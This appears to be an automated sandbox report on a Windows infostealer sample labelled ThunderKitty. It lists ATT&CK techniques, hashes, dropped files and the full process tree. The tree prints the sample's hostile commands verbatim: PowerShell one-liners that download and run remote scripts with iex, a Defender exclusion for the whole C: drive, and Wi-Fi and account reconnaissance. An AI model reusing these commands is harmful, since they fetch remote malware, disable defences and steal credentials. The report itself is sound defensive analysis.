23d29abc72fe7ea1237b91b83d34668b4106d02ee765b12fd069be5d1c005617

Analysis

max time kernel
92s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23/09/2024, 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe
Size

14.0MB
MD5

b1f25e965eb4d0850c3f3506db05b45a
SHA1

b022c12d697f8abfab04003cb161e3dac83e6f29
SHA256

23d29abc72fe7ea1237b91b83d34668b4106d02ee765b12fd069be5d1c005617
SHA512

f3a46e8d0cf36216a5dd5b300cca8105729ef3c4875e7bc5a62eb0dbd6d5b248dbba03738683a3d4070400f0a4b922d75a6f0dcfbc85e96e3ae6e1c9fd079efd
SSDEEP

196608:+SG4xZcgzx5TDH6KbJLFfI6OB/zIf8ryQ5S:+YxZ5/H6KbhFfpOlzIfxA

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	400	powershell.exe
11	532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
744	powershell.exe
400	powershell.exe
532	powershell.exe
4484	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1524	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
11	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5104	ARP.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3964	netsh.exe
1520	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2812	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2432	ipconfig.exe
4308	ipconfig.exe
2812	NETSTAT.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
400	powershell.exe
4484	PowerShell.exe
532	powershell.exe
744	powershell.exe
4484	PowerShell.exe
400	powershell.exe
744	powershell.exe
532	powershell.exe
532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	4484	PowerShell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: 33	2872	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2872	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	532	powershell.exe
Token: SeSecurityPrivilege	532	powershell.exe
Token: SeTakeOwnershipPrivilege	532	powershell.exe
Token: SeLoadDriverPrivilege	532	powershell.exe
Token: SeSystemProfilePrivilege	532	powershell.exe
Token: SeSystemtimePrivilege	532	powershell.exe
Token: SeProfSingleProcessPrivilege	532	powershell.exe
Token: SeIncBasePriorityPrivilege	532	powershell.exe
Token: SeCreatePagefilePrivilege	532	powershell.exe
Token: SeBackupPrivilege	532	powershell.exe
Token: SeRestorePrivilege	532	powershell.exe
Token: SeShutdownPrivilege	532	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeSystemEnvironmentPrivilege	532	powershell.exe
Token: SeRemoteShutdownPrivilege	532	powershell.exe
Token: SeUndockPrivilege	532	powershell.exe
Token: SeManageVolumePrivilege	532	powershell.exe
Token: 33	532	powershell.exe
Token: 34	532	powershell.exe
Token: 35	532	powershell.exe
Token: 36	532	powershell.exe
Token: SeIncreaseQuotaPrivilege	532	powershell.exe
Token: SeSecurityPrivilege	532	powershell.exe
Token: SeTakeOwnershipPrivilege	532	powershell.exe
Token: SeLoadDriverPrivilege	532	powershell.exe
Token: SeSystemProfilePrivilege	532	powershell.exe
Token: SeSystemtimePrivilege	532	powershell.exe
Token: SeProfSingleProcessPrivilege	532	powershell.exe
Token: SeIncBasePriorityPrivilege	532	powershell.exe
Token: SeCreatePagefilePrivilege	532	powershell.exe
Token: SeBackupPrivilege	532	powershell.exe
Token: SeRestorePrivilege	532	powershell.exe
Token: SeShutdownPrivilege	532	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeSystemEnvironmentPrivilege	532	powershell.exe
Token: SeRemoteShutdownPrivilege	532	powershell.exe
Token: SeUndockPrivilege	532	powershell.exe
Token: SeManageVolumePrivilege	532	powershell.exe
Token: 33	532	powershell.exe
Token: 34	532	powershell.exe
Token: 35	532	powershell.exe
Token: 36	532	powershell.exe
Token: SeIncreaseQuotaPrivilege	532	powershell.exe
Token: SeSecurityPrivilege	532	powershell.exe
Token: SeTakeOwnershipPrivilege	532	powershell.exe
Token: SeLoadDriverPrivilege	532	powershell.exe
Token: SeSystemProfilePrivilege	532	powershell.exe
Token: SeSystemtimePrivilege	532	powershell.exe
Token: SeProfSingleProcessPrivilege	532	powershell.exe
Token: SeIncBasePriorityPrivilege	532	powershell.exe
Token: SeCreatePagefilePrivilege	532	powershell.exe
Token: SeBackupPrivilege	532	powershell.exe
Token: SeRestorePrivilege	532	powershell.exe
Token: SeShutdownPrivilege	532	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeSystemEnvironmentPrivilege	532	powershell.exe
Token: SeRemoteShutdownPrivilege	532	powershell.exe
Token: SeUndockPrivilege	532	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 4488	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	84
PID 2384 wrote to memory of 4488	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	84
PID 2384 wrote to memory of 4828	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	85
PID 2384 wrote to memory of 4828	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	85
PID 2384 wrote to memory of 532	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	83
PID 2384 wrote to memory of 532	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	83
PID 4488 wrote to memory of 2404	4488	cmd.exe	88
PID 4488 wrote to memory of 2404	4488	cmd.exe	88
PID 2384 wrote to memory of 744	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	86
PID 2384 wrote to memory of 744	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	86
PID 2384 wrote to memory of 400	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	87
PID 2384 wrote to memory of 400	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	87
PID 2384 wrote to memory of 4896	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	90
PID 2384 wrote to memory of 4896	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	90
PID 2384 wrote to memory of 4484	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	91
PID 2384 wrote to memory of 4484	2384	2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe	91
PID 532 wrote to memory of 1556	532	powershell.exe	93
PID 532 wrote to memory of 1556	532	powershell.exe	93
PID 1556 wrote to memory of 1152	1556	csc.exe	94
PID 1556 wrote to memory of 1152	1556	csc.exe	94
PID 532 wrote to memory of 3964	532	powershell.exe	95
PID 532 wrote to memory of 3964	532	powershell.exe	95
PID 532 wrote to memory of 3068	532	powershell.exe	97
PID 532 wrote to memory of 3068	532	powershell.exe	97
PID 3068 wrote to memory of 4544	3068	net.exe	98
PID 3068 wrote to memory of 4544	3068	net.exe	98
PID 532 wrote to memory of 1524	532	powershell.exe	99
PID 532 wrote to memory of 1524	532	powershell.exe	99
PID 532 wrote to memory of 3852	532	powershell.exe	102
PID 532 wrote to memory of 3852	532	powershell.exe	102
PID 532 wrote to memory of 2348	532	powershell.exe	103
PID 532 wrote to memory of 2348	532	powershell.exe	103
PID 2348 wrote to memory of 1328	2348	net.exe	104
PID 2348 wrote to memory of 1328	2348	net.exe	104
PID 532 wrote to memory of 4308	532	powershell.exe	105
PID 532 wrote to memory of 4308	532	powershell.exe	105
PID 532 wrote to memory of 4432	532	powershell.exe	106
PID 532 wrote to memory of 4432	532	powershell.exe	106
PID 4432 wrote to memory of 5076	4432	net.exe	107
PID 4432 wrote to memory of 5076	4432	net.exe	107
PID 532 wrote to memory of 5016	532	powershell.exe	108
PID 532 wrote to memory of 5016	532	powershell.exe	108
PID 532 wrote to memory of 2812	532	powershell.exe	109
PID 532 wrote to memory of 2812	532	powershell.exe	109
PID 532 wrote to memory of 4988	532	powershell.exe	111
PID 532 wrote to memory of 4988	532	powershell.exe	111
PID 532 wrote to memory of 2432	532	powershell.exe	112
PID 532 wrote to memory of 2432	532	powershell.exe	112
PID 532 wrote to memory of 3928	532	powershell.exe	113
PID 532 wrote to memory of 3928	532	powershell.exe	113
PID 532 wrote to memory of 5104	532	powershell.exe	114
PID 532 wrote to memory of 5104	532	powershell.exe	114
PID 532 wrote to memory of 1520	532	powershell.exe	115
PID 532 wrote to memory of 1520	532	powershell.exe	115

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-23_b1f25e965eb4d0850c3f3506db05b45a_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1lmrkpkp\1lmrkpkp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEAC.tmp" "c:\Users\Admin\AppData\Local\Temp\1lmrkpkp\CSC25AA713627E04E899C37459B40C6B9DB.TMP"
      4⤵
      PID:1152
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3964
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:4544
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1524
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3852
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1328
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4308
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:5016
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2812
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4988
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2432
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3928
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:5104
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:2404
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:4828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:400
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4896
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4484

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x4e4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
40824eb204a848b5e6ae33ce272bc697

SHA1
3c96070f20e2e60bf3bcfd2aa7dde3f7fca53b23

SHA256
1f73467c74eb2dc8fa5606e0e9f5fc88de393f7da1623fd4481a558d37e76b00

SHA512
8d279669b28c1125d286f1aa03cda5650091e3c7f585053a62bd4e618054518c9cd11be25b61a94bf4264557aca033fbdd53d909fd8017a8bbd3d53170dc6248

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9af6e9689b1cdc232c2ab3ad047c70bd

SHA1
95aaaa4b8d70a8238b554f48a75bd885c8755dea

SHA256
a3a53d23e312beeecac5b169ed69be449e2244d161955c3f78d3d476273522c5

SHA512
9b1b746ab3e2be1ae85613d8db0b41f457a7ec736bc56e0b1c9ce8db45137a58e9ffab9306ac56d726ab2b892d08f120821278d17d4654add76db3edb8b22543

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1lmrkpkp\1lmrkpkp.dll

Filesize
4KB

MD5
ba5fb84856a3b5ec4f8e55ac5e0854b6

SHA1
e544e468df14963da7f8431556d536b57c804923

SHA256
4f0d012d546e092fba49176646bcc8f2b126344952cfa7a81a326298cc0c88b1

SHA512
57534a4e25c0fa4e083adfbf4313dc1db364c9c9f8fec08c8d0078eb1bbcb4307850673e043d282ea2d440040cb717e85d751f90b89a6c8c69dfefacb98517de

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBEAC.tmp

Filesize
1KB

MD5
ce3bd34979ed47ffae10c7dfe0de756c

SHA1
0a452910392d00594e95545f48208f472d5c9abe

SHA256
5c46c90bbe856a6a7c39b58ee530a87a308cce1cfad14906e9adec8b7639b85d

SHA512
f8d073d0e5ba47a6c023f0cae7461743ec7e0dd295b4206011d8890e94eea6afc5118d7ec74ff3a87e67899dcda7bcd644af7ff4a850eda2b1c9323ab711a015

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
21KB

MD5
c538637a6cbca50085a15e45920c936d

SHA1
8fa91ca7192eae9184885ae376444fcd421c3e60

SHA256
72a0c95e1e1767927dcb0e14c9232099e10f2c103dffe3ced2441857841e419e

SHA512
b599df3c8d75ebaf9d3d7083b5eb3fdbcc58d434b1a4eb9e26d8f93e38bb258716fed4f653ccc4439a130eec383ee324c659126140116e59dfb7f787153984ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fjpezsib.wlj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lmrkpkp\1lmrkpkp.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lmrkpkp\1lmrkpkp.cmdline

Filesize
369B

MD5
085b3f82a581c0524d3fa529c5afe553

SHA1
1979671cce759edad5c589383435c54beecc680a

SHA256
42285fd31f59680f5a959db83efdc0f6c28c68967e879ce9b9d4d2effd390a50

SHA512
e014bd2b7568f85cd06755cf8485fee83b0b6febe1aae8afe4abc41be6272a36205a21d8cc0e191b930d53d38edf57d383f5a4bcf4a5a3854393041ffff4a3e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lmrkpkp\CSC25AA713627E04E899C37459B40C6B9DB.TMP

Filesize
652B

MD5
677472d317aea93871f7e799457608e3

SHA1
9e534337c61b13fe26036e4567b5be127a303df3

SHA256
ed202d1663af08cc4c0a479fd56a57b67dc105fb4b74b10f1c32d2810b088287

SHA512
0b3ae5e3ed86dca82d8c39c2076693020c06749d8b2326b03d48644b1c45edfb7e1eb6bdf3ed188aed67492510e26c9af893bd94e490be95980e11d258669ce8

Download Submit
memory/400-0-0x00007FFCCA6B3000-0x00007FFCCA6B5000-memory.dmp

Filesize
8KB

Download
memory/400-53-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

Filesize
10.8MB

Download
memory/400-14-0x000001F477EF0000-0x000001F477F12000-memory.dmp

Filesize
136KB

Download
memory/400-12-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

Filesize
10.8MB

Download
memory/400-10-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

Filesize
10.8MB

Download
memory/532-66-0x000001ACF6290000-0x000001ACF6298000-memory.dmp

Filesize
32KB

Download
memory/532-70-0x000001ACF6D50000-0x000001ACF6D7A000-memory.dmp

Filesize
168KB

Download
memory/532-71-0x000001ACF6D50000-0x000001ACF6D74000-memory.dmp

Filesize
144KB

Download
memory/532-47-0x000001ACF7150000-0x000001ACF78F6000-memory.dmp

Filesize
7.6MB

Download
memory/532-106-0x000001ACF6D70000-0x000001ACF6D82000-memory.dmp

Filesize
72KB

Download
memory/532-107-0x000001ACF6D50000-0x000001ACF6D5A000-memory.dmp

Filesize
40KB

Download